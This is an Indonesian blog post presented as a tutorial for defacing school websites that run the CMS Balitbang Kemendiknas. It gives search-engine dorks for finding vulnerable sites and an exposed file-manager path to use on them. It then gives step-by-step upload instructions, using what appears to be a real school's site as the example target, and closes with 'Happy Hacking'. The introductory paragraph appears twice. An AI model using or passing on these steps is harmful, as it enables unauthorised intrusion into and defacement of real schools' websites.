Kali ini saya akan membagikan Tutorial Deface Website CMS Balitbang Kemendiknas
CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.
Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r. Langsung aja :P
Dork :
CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.
Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r. Langsung aja :P
Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"
Exploit :
editor/filemanager/connectors/test.html
- Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
- Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
- Tampilan awal website target
- Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter. Contoh =>http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem%20Point Menjadi => http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html jika berhasil maka tampilanya akan seperti ini :
- Ubah ASP menjadi PHP dan pilih file kamu hanya yang berekstensi txt lalu klik upload, jika file sukses terupload, maka akan tampil seperti dibawah ini :
- Setelah itu untuk cara memanggil file yang kita Upload tadi ketik /userfiles/file/Nama_File.txt contoh => http://www.sman1kotabaru.sch.id/userfiles/file/Just Test.txt maka tampilanya seperti ini :
Sekian dulu Tutornya and Happy Hacking ^_^
0 komentar:
Posting Komentar